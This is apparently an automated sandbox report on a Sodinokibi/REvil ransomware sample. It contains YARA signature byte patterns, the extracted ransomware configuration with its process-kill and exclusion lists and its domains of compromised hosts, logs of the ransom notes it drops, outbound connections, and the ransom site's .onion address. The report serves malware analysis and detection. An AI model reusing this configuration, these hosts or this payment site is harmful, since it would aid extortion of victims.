            • 0x8233:$d13: F2 8B 43 38 F7 6F 20 03 C8 8B 43 40 13 F2 F7 6F 18 03 C8 8B 43 10 13 F2 F7 6F 48 03 C8 8B 43 28 13 F2 F7 6F 30 03 C8 8B 43 20 13 F2 F7 6F 38 03 C8 8B 43 30 13 F2 F7 6F 28 03 C8 8B 43 48 13 F2
            • 0x89a6:$d14: 8B 47 30 13 F2 F7 6F 40 03 C8 13 F2 0F A4 CE 01 89 73 74 03 C9 89 4B 70 8B 47 30 F7 6F 48 8B C8 8B F2 8B 47 38 F7 6F 40 03 C8 13 F2 0F A4 CE 01 89 73 7C 03 C9 89 4B 78 8B 47 38 F7 6F 48 8B C8
            0.0.myfile.exe.270000.0.unpackWindows_Ransomware_Sodinokibi_a282ba44Identifies SODINOKIBI/REvil ransomwareunknown
            • 0x3e99:$c3: 75 0C 72 D3 33 C0 40 5F 5E 5B 8B E5 5D C3 33 C0 EB F5 55 8B EC 83
            • 0x4a65:$c4: 0C 8B 04 B0 83 78 04 05 75 1C FF 70 08 FF 70 0C FF 75 0C FF
            • 0x5c13:$c5: FB 8B 45 FC 50 8B 08 FF 51 08 5E 8B C7 5F 5B 8B E5 5D C3 55
            • 0x8f7b:$c6: BC 00 00 00 33 D2 8B 4D F4 8B F1 8B 45 F0 0F A4 C1 01 C1 EE 1F
            • 0x957d:$c7: 54 8B CE F7 D1 8B C2 23 4D DC F7 D0 33 4D F4 23 C7 33 45 E8 89
            • 0xa615:$c8: 0C 89 46 0C 85 C0 75 2A 33 C0 EB 6C 8B 46 08 85 C0 74 62 6B
            0.0.myfile.exe.270000.0.unpackREvilREvil PayloadR3MRUM
            • 0x17540:$RE1: expand 32-byte kexpand 16-byte k
            • 0xbc30:$RE2: sysshadow
            • 0x107f8:$RE2: sysshadow
            • 0x14470:$RE2: sysshadow
            • 0xbc50:$RE3: SCROLLBAR
            • 0x10810:$RE3: SCROLLBAR
            • 0x14488:$RE3: SCROLLBAR
            • 0xbc40:$RE4: msctfime ui
            • 0x10804:$RE4: msctfime ui
            • 0x1447c:$RE4: msctfime ui
            • 0xbc60:$RE5: \BaseNamedObjects\%S
            • 0x1081c:$RE5: \BaseNamedObjects\%S
            • 0x14494:$RE5: \BaseNamedObjects\%S
            • 0x4e1d:$decode: 33 D2 8A 9C 3D FC FE FF FF 8B C7 0F B6 CB F7 75 0C 8B 45 08 0F B6 04 02 03 C6 03 C8 0F B6 F1 8A 84 35 FC FE FF FF 88 84 3D FC FE FF FF 47 88 9C 35 FC FE FF FF 81 FF 00 01 00 00 72 C3
            0.0.myfile.exe.270000.0.unpackWin32_Ransomware_RevilunknownReversingLabs
            • 0x5699:$search_files: 55 8B EC 81 EC 68 02 00 00 53 56 8B 75 08 33 C0 57 8B 7D 0C 8B D8 50 56 89 45 F4 89 5D F0 89 45 F8 89 45 FC FF 57 04 59 59 85 C0 0F 84 AC 01 00 00 8D 45 F0 56 50 E8 B7 02 00 00 53 56 FF 77 0C ...
            • 0x5c26:$remote_connection: 55 8B EC 81 EC 5C 01 00 00 56 57 8D 85 A4 FE FF FF 50 68 90 00 00 00 6A 04 68 E7 04 00 00 68 28 CC 28 00 E8 B5 E5 FF FF 83 C4 14 33 F6 33 C0 66 89 85 34 FF FF FF 8D 85 A4 FE FF FF 56 56 56 56 ...
            • 0x1ca9:$encrypt_files: 55 8B EC 51 83 7D 14 00 53 56 57 BB 00 00 10 00 7F 0A 7C 05 39 5D 10 73 03 8B 5D 10 8B 7D 08 8D 83 58 01 00 00 50 57 E8 9A 38 00 00 59 59 EB 21 E8 AA 1C 00 00 83 F8 08 75 2F 6A 64 E8 6A 20 00 ...
            • 0x5a7a:$enum_resources: 55 8B EC 83 EC 10 8D 45 F8 50 FF 75 0C 6A 00 6A 01 6A 02 FF 15 48 CB 28 00 85 C0 74 07 33 C0 E9 9D 00 00 00 83 4D FC FF B8 00 40 00 00 57 50 89 45 F4 E8 6D D5 FF FF 8B F8 59 85 FF 75 0D FF 75 ...
            Click to see the 5 entries

            Spam, unwanted Advertisements and Ransom Demands

            barindex
            Source: Registry Key setAuthor: Joe Security: Data: Details: .g165067x37, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\myfile.exe, ProcessId: 7156, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\recfg\rnd_ext
            No Suricata rule has matched

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Source: myfile.exeAvira: detected
            Source: https://www.hostaletdelsindians.es/news/temp/wpuatzictpgv.jpgAvira URL Cloud: Label: malware
            Source: https://hostaletdelsindians.es/news/temp/wpuatzictpgv.jpgAvira URL Cloud: Label: malware
            Source: https://hostaletdelsindians.es:443/news/temp/wpuatzictpgv.jpggx.gifageAvira URL Cloud: Label: malware
            Source: https://bd2fly.com:443/static/game/nkfydhwjjfbipa.jpgicgx.jpgurce0Avira URL Cloud: Label: malware
            Source: https://www.hostaletdelsindians.es/wp-content/plugins/gtranslate/gtranslate-style24.css?ver=6.0.9Avira URL Cloud: Label: malware
            Source: 00000000.00000003.1647623477.0000000002C2F000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: REvil {"pk": "jD6pLfwUHlEoWBKadlZ4A78CLm8I0UKlzdzW7XautWE=", "pid": "33", "sub": "357", "dbg": false, "fast": true, "wipe": true, "wht": {"fld": ["application data", "tor browser", "windows.old", "appdata", "$windows.~bt", "intel", "perflogs", "program files", "programdata", "boot", "msocache", "program files (x86)", "system volume information", "$windows.~ws", "windows", "mozilla", "google", "$recycle.bin"], "fls": ["desktop.ini", "ntuser.dat", "bootfont.bin", "ntldr", "autorun.inf", "ntuser.ini", "ntuser.dat.log", "bootsect.bak", "thumbs.db", "iconcache.db", "boot.ini"], "ext": ["idx", "hta", "icns", "cmd", "wpx", "msp", "msu", "cab", "diagpkg", "spl", "scr", "dll", "themepack", "bin", "prf", "msc", "nls", "msi", "ps1", "mod", "exe", "bat", "adv", "386", "ico", "theme", "ani", "sys", "diagcab", "deskthemepack", "msstyles", "lock", "diagcfg", "ocx", "hlp", "com", "ics", "lnk", "drv", "shs", "rom", "cur", "rtp", "cpl", "key", "icl", "ldf", "nomedia", "mpa"]}, "wfld": ["backup"], "prc": ["thunderbird.exe", "synctime.exe", "dbsnmp.exe", "encsvc.exe", "isqlplussvc.exe", "ocautoupds.exe", "mydesktopqos.exe", "powerpnt.exe", "mysqld.exe", "mydesktopservice.exe", "outlook.exe", "mysqld_nt.exe", "firefoxconfig.exe", "sqbcoreservice.exe", "steam.exe", "sqlbrowser.exe", "infopath.exe", "thebat.exe", "msaccess.exe", "mysqld_opt.exe", "tbirdconfig.exe", "visio.exe", "msftesql.exe", "excel.exe", "oracle.exe", "mspub.exe", "sqlservr.exe", "agntsvc.exe", "onenote.exe", "winword.exe", "thebat64.exe", "dbeng50.exe", "wordpad.exe", "ocssd.exe", "sqlwriter.exe", "ocomm.exe", "sqlagent.exe", "xfssvccon.exe"], "dmn": "parksideseniorliving.net;90nguyentuan.com;enactusnhlstenden.com;avisioninthedesert.com;lashandbrowenvy.com;satoblog.org;rsidesigns.com;pansionatblago.ru;magrinya.net;baikalflot.ru;bd2fly.com;business-basic.de;afbudsrejserallinclusive.dk;m2graph.fr;stanleyqualitysystems.com;altitudeboise.com;lexced.com;chainofhopeeurope.eu;bayshoreelite.com;mursall.de;amelielecompte.wordpress.com;wribrazil.com;testitjavertailut.net;chomiksy.net;vitoriaecoturismo.com.br;georgemuncey.com;funworx.de;nbva.co.uk;c-sprop.com;relevantonline.eu;abulanov.com;maxcube24.com.ua;kenmccallum.com;stage-infirmier.fr;skoczynski.eu;mieleshopping.it;holocine.de;oscommunity.de;ikadomus.com;bundan.com;davedavisphotos.com;activeterroristwarningcompany.com;hostaletdelsindians.es;almamidwifery.com;innervisions-id.com;gazelle-du-web.com;angelsmirrorus.com;efficiencyconsulting.es;vedsegaard.dk;schroederschoembs.com;welovecustomers.fr;11.in.ua;modamarfil.com;look.academy;rhino-storage.co.uk;solutionshosting.co.uk;vdolg24.online;azerbaycanas.com;racefietsenblog.nl;photographycreativity.co.uk;crestgood.com;voetbalhoogeveen.nl;suitesartemis.gr;bodymindchallenger.com;test-teleachat.fr;sjtpo.org;patassociation.com;iron-mine.ru;deduktia.fi;ntinasfiloxenia.gr;banukumbak.com;forextimes.ru;rattanwarehouse.co.uk;mslp.org;wineandgo.hu;happycatering.de;dogsunlimitedguide.com;rubyaudiology.com;bridalcave.com;
            Source: 0.0.myfile.exe.270000.0.unpackMalware Configuration Extractor: Sodinokibi {"pk": "jD6pLfwUHlEoWBKadlZ4A78CLm8I0UKlzdzW7XautWE=", "pid": "33", "sub": "357", "dbg": false, "fast": true, "wipe": true, "wht": {"fld": ["application data", "tor browser", "windows.old", "appdata", "$windows.~bt", "intel", "perflogs", "program files", "programdata", "boot", "msocache", "program files (x86)", "system volume information", "$windows.~ws", "windows", "mozilla", "google", "$recycle.bin"], "fls": ["desktop.ini", "ntuser.dat", "bootfont.bin", "ntldr", "autorun.inf", "ntuser.ini", "ntuser.dat.log", "bootsect.bak", "thumbs.db", "iconcache.db", "boot.ini"], "ext": ["idx", "hta", "icns", "cmd", "wpx", "msp", "msu", "cab", "diagpkg", "spl", "scr", "dll", "themepack", "bin", "prf", "msc", "nls", "msi", "ps1", "mod", "exe", "bat", "adv", "386", "ico", "theme", "ani", "sys", "diagcab", "deskthemepack", "msstyles", "lock", "diagcfg", "ocx", "hlp", "com", "ics", "lnk", "drv", "shs", "rom", "cur", "rtp", "cpl", "key", "icl", "ldf", "nomedia", "mpa"]}, "wfld": ["backup"], "prc": ["thunderbird.exe", "synctime.exe", "dbsnmp.exe", "encsvc.exe", "isqlplussvc.exe", "ocautoupds.exe", "mydesktopqos.exe", "powerpnt.exe", "mysqld.exe", "mydesktopservice.exe", "outlook.exe", "mysqld_nt.exe", "firefoxconfig.exe", "sqbcoreservice.exe", "steam.exe", "sqlbrowser.exe", "infopath.exe", "thebat.exe", "msaccess.exe", "mysqld_opt.exe", "tbirdconfig.exe", "visio.exe", "msftesql.exe", "excel.exe", "oracle.exe", "mspub.exe", "sqlservr.exe", "agntsvc.exe", "onenote.exe", "winword.exe", "thebat64.exe", "dbeng50.exe", "wordpad.exe", "ocssd.exe", "sqlwriter.exe", "ocomm.exe", "sqlagent.exe", "xfssvccon.exe"], "dmn": "parksideseniorliving.net;90nguyentuan.com;enactusnhlstenden.com;avisioninthedesert.com;lashandbrowenvy.com;satoblog.org;rsidesigns.com;pansionatblago.ru;magrinya.net;baikalflot.ru;bd2fly.com;business-basic.de;afbudsrejserallinclusive.dk;m2graph.fr;stanleyqualitysystems.com;altitudeboise.com;lexced.com;chainofhopeeurope.eu;bayshoreelite.com;mursall.de;amelielecompte.wordpress.com;wribrazil.com;testitjavertailut.net;chomiksy.net;vitoriaecoturismo.com.br;georgemuncey.com;funworx.de;nbva.co.uk;c-sprop.com;relevantonline.eu;abulanov.com;maxcube24.com.ua;kenmccallum.com;stage-infirmier.fr;skoczynski.eu;mieleshopping.it;holocine.de;oscommunity.de;ikadomus.com;bundan.com;davedavisphotos.com;activeterroristwarningcompany.com;hostaletdelsindians.es;almamidwifery.com;innervisions-id.com;gazelle-du-web.com;angelsmirrorus.com;efficiencyconsulting.es;vedsegaard.dk;schroederschoembs.com;welovecustomers.fr;11.in.ua;modamarfil.com;look.academy;rhino-storage.co.uk;solutionshosting.co.uk;vdolg24.online;azerbaycanas.com;racefietsenblog.nl;photographycreativity.co.uk;crestgood.com;voetbalhoogeveen.nl;suitesartemis.gr;bodymindchallenger.com;test-teleachat.fr;sjtpo.org;patassociation.com;iron-mine.ru;deduktia.fi;ntinasfiloxenia.gr;banukumbak.com;forextimes.ru;rattanwarehouse.co.uk;mslp.org;wineandgo.hu;happycatering.de;dogsunlimitedguide.com;rubyaudiology.com;bridalcave
            Source: maxcube24.com.uaVirustotal: Detection: 6%Perma Link
            Source: stanleyqualitysystems.comVirustotal: Detection: 5%Perma Link
            Source: holocine.deVirustotal: Detection: 5%Perma Link
            Source: myfile.exeVirustotal: Detection: 90%Perma Link
            Source: myfile.exeReversingLabs: Detection: 97%
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 97.9% probability
            Source: myfile.exeJoe Sandbox ML: detected
            Source: C:\Users\user\Desktop\myfile.exeCode function: 0_2_00274CFF CryptStringToBinaryW,CryptStringToBinaryW,0_2_00274CFF
            Source: C:\Users\user\Desktop\myfile.exeCode function: 0_2_002746DF CryptAcquireContextW,CryptGenRandom,0_2_002746DF
            Source: C:\Users\user\Desktop\myfile.exeCode function: 0_2_00274D60 CryptBinaryToStringW,CryptBinaryToStringW,0_2_00274D60
            Source: myfile.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: C:\Users\user\Desktop\myfile.exeDirectory created: c:\program files\g165067x37-readme.txtJump to behavior
            Source: C:\Users\user\Desktop\myfile.exeDirectory created: c:\program files\8c3ea92d.lockJump to behavior
            Source: C:\Users\user\Desktop\myfile.exeFile created: C:\g165067x37-readme.txtJump to behavior
            Source: C:\Users\user\Desktop\myfile.exeFile created: c:\$winreagent\g165067x37-readme.txtJump to behavior
            Source: C:\Users\user\Desktop\myfile.exeFile created: c:\program files\g165067x37-readme.txtJump to behavior
            Source: C:\Users\user\Desktop\myfile.exeFile created: c:\program files (x86)\g165067x37-readme.txtJump to behavior
            Source: C:\Users\user\Desktop\myfile.exeFile created: c:\recovery\g165067x37-readme.txtJump to behavior
            Source: C:\Users\user\Desktop\myfile.exeFile created: c:\users\g165067x37-readme.txtJump to behavior
            Source: C:\Users\user\Desktop\myfile.exeFile created: c:\$winreagent\scratch\g165067x37-readme.txtJump to behavior
            Source: C:\Users\user\Desktop\myfile.exeFile created: c:\users\default\g165067x37-readme.txtJump to behavior
            Source: C:\Users\user\Desktop\myfile.exeFile created: c:\users\user\g165067x37-readme.txtJump to behavior
            Source: C:\Users\user\Desktop\myfile.exeFile created: c:\users\public\g165067x37-readme.txtJump to behavior
            Source: C:\Users\user\Desktop\myfile.exeFile created: c:\users\default\desktop\g165067x37-readme.txtJump to behavior
            Source: C:\Users\user\Desktop\myfile.exeFile created: c:\users\default\documents\g165067x37-readme.txtJump to behavior
            Source: C:\Users\user\Desktop\myfile.exeFile created: c:\users\default\downloads\g165067x37-readme.txtJump to behavior
            Source: C:\Users\user\Desktop\myfile.exeFile created: c:\users\default\favorites\g165067x37-readme.txtJump to behavior
            Source: C:\Users\user\Desktop\myfile.exeFile created: c:\users\default\links\g165067x37-readme.txtJump to behavior
            Source: C:\Users\user\Desktop\myfile.exeFile created: c:\users\default\music\g165067x37-readme.txtJump to behavior
            Source: C:\Users\user\Desktop\myfile.exeFile created: c:\users\default\onedrive\g165067x37-readme.txtJump to behavior
            Source: C:\Users\user\Desktop\myfile.exeFile created: c:\users\default\pictures\g165067x37-readme.txtJump to behavior
            Source: C:\Users\user\Desktop\myfile.exeFile created: c:\users\default\saved games\g165067x37-readme.txtJump to behavior
            Source: C:\Users\user\Desktop\myfile.exeFile created: c:\users\default\videos\g165067x37-readme.txtJump to behavior
            Source: C:\Users\user\Desktop\myfile.exeFile created: c:\users\user\.ms-ad\g165067x37-readme.txtJump to behavior
            Source: C:\Users\user\Desktop\myfile.exeFile created: c:\users\user\3d objects\g165067x37-readme.txtJump to behavior
            Source: C:\Users\user\Desktop\myfile.exeFile created: c:\users\user\contacts\g165067x37-readme.txtJump to behavior
            Source: C:\Users\user\Desktop\myfile.exeFile created: c:\users\user\desktop\g165067x37-readme.txtJump to behavior
            Source: C:\Users\user\Desktop\myfile.exeFile created: c:\users\user\documents\g165067x37-readme.txtJump to behavior
            Source: C:\Users\user\Desktop\myfile.exeFile created: c:\users\user\downloads\g165067x37-readme.txtJump to behavior
            Source: C:\Users\user\Desktop\myfile.exeFile created: c:\users\user\favorites\g165067x37-readme.txtJump to behavior
            Source: C:\Users\user\Desktop\myfile.exeFile created: c:\users\user\links\g165067x37-readme.txtJump to behavior
            Source: C:\Users\user\Desktop\myfile.exeFile created: c:\users\user\music\g165067x37-readme.txtJump to behavior
            Source: C:\Users\user\Desktop\myfile.exeFile created: c:\users\user\onedrive\g165067x37-readme.txtJump to behavior
            Source: C:\Users\user\Desktop\myfile.exeFile created: c:\users\user\pictures\g165067x37-readme.txtJump to behavior
            Source: C:\Users\user\Desktop\myfile.exeFile created: c:\users\user\recent\g165067x37-readme.txtJump to behavior
            Source: C:\Users\user\Desktop\myfile.exeFile created: c:\users\user\saved games\g165067x37-readme.txtJump to behavior
            Source: C:\Users\user\Desktop\myfile.exeFile created: c:\users\user\searches\g165067x37-readme.txtJump to behavior
            Source: C:\Users\user\Desktop\myfile.exeFile created: c:\users\user\videos\g165067x37-readme.txtJump to behavior
            Source: C:\Users\user\Desktop\myfile.exeFile created: c:\users\public\accountpictures\g165067x37-readme.txtJump to behavior
            Source: C:\Users\user\Desktop\myfile.exeFile created: c:\users\public\desktop\g165067x37-readme.txtJump to behavior
            Source: C:\Users\user\Desktop\myfile.exeFile created: c:\users\public\documents\g165067x37-readme.txtJump to behavior
            Source: C:\Users\user\Desktop\myfile.exeFile created: c:\users\public\downloads\g165067x37-readme.txtJump to behavior
            Source: C:\Users\user\Desktop\myfile.exeFile created: c:\users\public\libraries\g165067x37-readme.txtJump to behavior
            Source: C:\Users\user\Desktop\myfile.exeFile created: c:\users\public\music\g165067x37-readme.txtJump to behavior
            Source: C:\Users\user\Desktop\myfile.exeFile created: c:\users\public\pictures\g165067x37-readme.txtJump to behavior
            Source: C:\Users\user\Desktop\myfile.exeFile created: c:\users\public\videos\g165067x37-readme.txtJump to behavior
            Source: C:\Users\user\Desktop\myfile.exeFile created: c:\users\user\desktop\dtbzgiooso\g165067x37-readme.txtJump to behavior
            Source: C:\Users\user\Desktop\myfile.exeFile created: c:\users\user\desktop\dvwhkmnfnn\g165067x37-readme.txtJump to behavior
            Source: C:\Users\user\Desktop\myfile.exeFile created: c:\users\user\desktop\htagvdfuie\g165067x37-readme.txtJump to behavior
            Source: C:\Users\user\Desktop\myfile.exeFile created: c:\users\user\desktop\jsdngycowy\g165067x37-readme.txtJump to behavior
            Source: C:\Users\user\Desktop\myfile.exeFile created: c:\users\user\desktop\nikhqaiqau\g165067x37-readme.txtJump to behavior
            Source: C:\Users\user\Desktop\myfile.exeFile created: c:\users\user\desktop\onbqclyspu\g165067x37-readme.txtJump to behavior
            Source: C:\Users\user\Desktop\myfile.exeFile created: c:\users\user\desktop\sqrkhnbnyn\g165067x37-readme.txtJump to behavior
            Source: C:\Users\user\Desktop\myfile.exeFile created: c:\users\user\desktop\wkxewiotxi\g165067x37-readme.txtJump to behavior
            Source: C:\Users\user\Desktop\myfile.exeFile created: c:\users\user\desktop\xzxhavgrag\g165067x37-readme.txtJump to behavior
            Source: C:\Users\user\Desktop\myfile.exeFile created: c:\users\user\documents\dtbzgiooso\g165067x37-readme.txtJump to behavior
            Source: C:\Users\user\Desktop\myfile.exeFile created: c:\users\user\documents\dvwhkmnfnn\g165067x37-readme.txtJump to behavior
            Source: C:\Users\user\Desktop\myfile.exeFile created: c:\users\user\documents\htagvdfuie\g165067x37-readme.txtJump to behavior
            Source: C:\Users\user\Desktop\myfile.exeFile created: c:\users\user\documents\jsdngycowy\g165067x37-readme.txtJump to behavior
            Source: C:\Users\user\Desktop\myfile.exeFile created: c:\users\user\documents\nikhqaiqau\g165067x37-readme.txtJump to behavior
            Source: C:\Users\user\Desktop\myfile.exeFile created: c:\users\user\documents\onbqclyspu\g165067x37-readme.txtJump to behavior
            Source: C:\Users\user\Desktop\myfile.exeFile created: c:\users\user\documents\sqrkhnbnyn\g165067x37-readme.txtJump to behavior
            Source: C:\Users\user\Desktop\myfile.exeFile created: c:\users\user\documents\wkxewiotxi\g165067x37-readme.txtJump to behavior
            Source: C:\Users\user\Desktop\myfile.exeFile created: c:\users\user\documents\xzxhavgrag\g165067x37-readme.txtJump to behavior
            Source: C:\Users\user\Desktop\myfile.exeFile created: c:\users\user\favorites\links\g165067x37-readme.txtJump to behavior
            Source: C:\Users\user\Desktop\myfile.exeFile created: c:\users\user\pictures\camera roll\g165067x37-readme.txtJump to behavior
            Source: C:\Users\user\Desktop\myfile.exeFile created: c:\users\user\pictures\saved pictures\g165067x37-readme.txtJump to behavior
            Source: unknownHTTPS traffic detected: 35.215.83.253:443 -> 192.168.2.4:49737 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 160.153.0.131:443 -> 192.168.2.4:49738 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 185.58.213.84:443 -> 192.168.2.4:49739 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 89.108.65.79:443 -> 192.168.2.4:49740 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 217.160.0.18:443 -> 192.168.2.4:49741 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 188.40.30.106:443 -> 192.168.2.4:49742 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 138.201.61.68:443 -> 192.168.2.4:49743 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 89.116.147.189:443 -> 192.168.2.4:49744 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 208.73.140.70:443 -> 192.168.2.4:49745 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 208.73.140.70:443 -> 192.168.2.4:49746 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49747 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.67.71.217:443 -> 192.168.2.4:49748 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.26.0.120:443 -> 192.168.2.4:49749 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 87.118.122.41:443 -> 192.168.2.4:49750 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 87.118.122.41:443 -> 192.168.2.4:49751 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 51.15.159.75:443 -> 192.168.2.4:49752 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 160.153.0.174:443 -> 192.168.2.4:49753 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 95.130.22.108:443 -> 192.168.2.4:49754 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49756 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.67.158.62:443 -> 192.168.2.4:49757 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 134.209.129.254:443 -> 192.168.2.4:49758 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 52.215.137.200:443 -> 192.168.2.4:49759 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 52.215.137.200:443 -> 192.168.2.4:49760 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 85.92.72.56:443 -> 192.168.2.4:49761 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 23.236.62.147:443 -> 192.168.2.4:49762 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 85.10.140.71:443 -> 192.168.2.4:49763 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 188.246.227.29:443 -> 192.168.2.4:49764 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 185.68.16.21:443 -> 192.168.2.4:49765 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49766 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 141.95.251.157:443 -> 192.168.2.4:49767 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 35.214.166.193:443 -> 192.168.2.4:49769 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 35.214.166.193:443 -> 192.168.2.4:49770 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 109.237.132.56:443 -> 192.168.2.4:49771 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 80.158.2.41:443 -> 192.168.2.4:49772 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 35.214.211.239:443 -> 192.168.2.4:49773 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 185.15.78.186:443 -> 192.168.2.4:49774 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 185.15.78.186:443 -> 192.168.2.4:49775 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 198.185.159.145:443 -> 192.168.2.4:49776 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 198.185.159.144:443 -> 192.168.2.4:49777 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 95.215.226.251:443 -> 192.168.2.4:49778 version: TLS 1.2
            Source: Binary string: \\?\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\~ source: myfile.exe, 00000000.00000003.2024747087.0000000004343000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \\?\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ source: myfile.exe, 00000000.00000003.2018769602.0000000002BD7000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2024670998.0000000002BD7000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2020421518.0000000002BD7000.00000004.00000020.00020000.00000000.sdmp
            Source: C:\Users\user\Desktop\myfile.exeFile opened: z:Jump to behavior
            Source: C:\Users\user\Desktop\myfile.exeFile opened: x:Jump to behavior
            Source: C:\Users\user\Desktop\myfile.exeFile opened: v:Jump to behavior
            Source: C:\Users\user\Desktop\myfile.exeFile opened: t:Jump to behavior
            Source: C:\Users\user\Desktop\myfile.exeFile opened: r:Jump to behavior
            Source: C:\Users\user\Desktop\myfile.exeFile opened: p:Jump to behavior
            Source: C:\Users\user\Desktop\myfile.exeFile opened: n:Jump to behavior
            Source: C:\Users\user\Desktop\myfile.exeFile opened: l:Jump to behavior
            Source: C:\Users\user\Desktop\myfile.exeFile opened: j:Jump to behavior
            Source: C:\Users\user\Desktop\myfile.exeFile opened: h:Jump to behavior
            Source: C:\Users\user\Desktop\myfile.exeFile opened: f:Jump to behavior
            Source: C:\Users\user\Desktop\myfile.exeFile opened: b:Jump to behavior
            Source: C:\Users\user\Desktop\myfile.exeFile opened: y:Jump to behavior
            Source: C:\Users\user\Desktop\myfile.exeFile opened: w:Jump to behavior
            Source: C:\Users\user\Desktop\myfile.exeFile opened: u:Jump to behavior
            Source: C:\Users\user\Desktop\myfile.exeFile opened: s:Jump to behavior
            Source: C:\Users\user\Desktop\myfile.exeFile opened: q:Jump to behavior
            Source: C:\Users\user\Desktop\myfile.exeFile opened: o:Jump to behavior
            Source: C:\Users\user\Desktop\myfile.exeFile opened: m:Jump to behavior
            Source: C:\Users\user\Desktop\myfile.exeFile opened: k:Jump to behavior
            Source: C:\Users\user\Desktop\myfile.exeFile opened: i:Jump to behavior
            Source: C:\Users\user\Desktop\myfile.exeFile opened: g:Jump to behavior
            Source: C:\Users\user\Desktop\myfile.exeFile opened: e:Jump to behavior
            Source: C:\Users\user\Desktop\myfile.exeFile opened: c:Jump to behavior
            Source: C:\Users\user\Desktop\myfile.exeFile opened: a:Jump to behavior
            Source: C:\Users\user\Desktop\myfile.exeCode function: 0_2_00276299 FindFirstFileW,FindNextFileW,FindClose,0_2_00276299
            Source: C:\Users\user\Desktop\myfile.exeFile opened: C:\Windows\WinSxS\Jump to behavior
            Source: C:\Users\user\Desktop\myfile.exeFile opened: C:\Windows\WinSxS\Backup\amd64_microsoft-client-li..m-service.resources_31bf3856ad364e35_10.0.19041.1865_en-us_b6d4cf229ed6dfa6.manifestJump to behavior
            Source: C:\Users\user\Desktop\myfile.exeFile opened: C:\Windows\WinSxS\Backup\amd64_hid-user.resources_31bf3856ad364e35_10.0.19041.1_en-gb_140ae2618f6740b3_hidserv.dll.mui_561adfc8Jump to behavior
            Source: C:\Users\user\Desktop\myfile.exeFile opened: C:\Windows\WinSxS\Backup\Jump to behavior
            Source: C:\Users\user\Desktop\myfile.exeFile opened: C:\Windows\WinSxS\Backup\amd64_microsoft-client-li..keyhelper.resources_31bf3856ad364e35_10.0.19041.1_en-us_a9723a608a71b1eb.manifestJump to behavior
            Source: C:\Users\user\Desktop\myfile.exeFile opened: C:\Windows\WinSxS\Backup\amd64_hid-user.resources_31bf3856ad364e35_10.0.19041.1_en-gb_140ae2618f6740b3.manifestJump to behavior

            Networking

            barindex
            Source: myfile.exe, 00000000.00000003.1934915360.0000000002C37000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/1A63B2FBDC010061
            Source: myfile.exe, 00000000.00000003.2589188241.0000000002C37000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/1A63B2FBDC010061
            Source: myfile.exe, 00000000.00000003.2155301553.0000000002C37000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/1A63B2FBDC010061
            Source: myfile.exe, 00000000.00000003.1942076208.0000000002C37000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/1A63B2FBDC010061
            Source: myfile.exe, 00000000.00000003.1980534561.0000000002C37000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/1A63B2FBDC010061
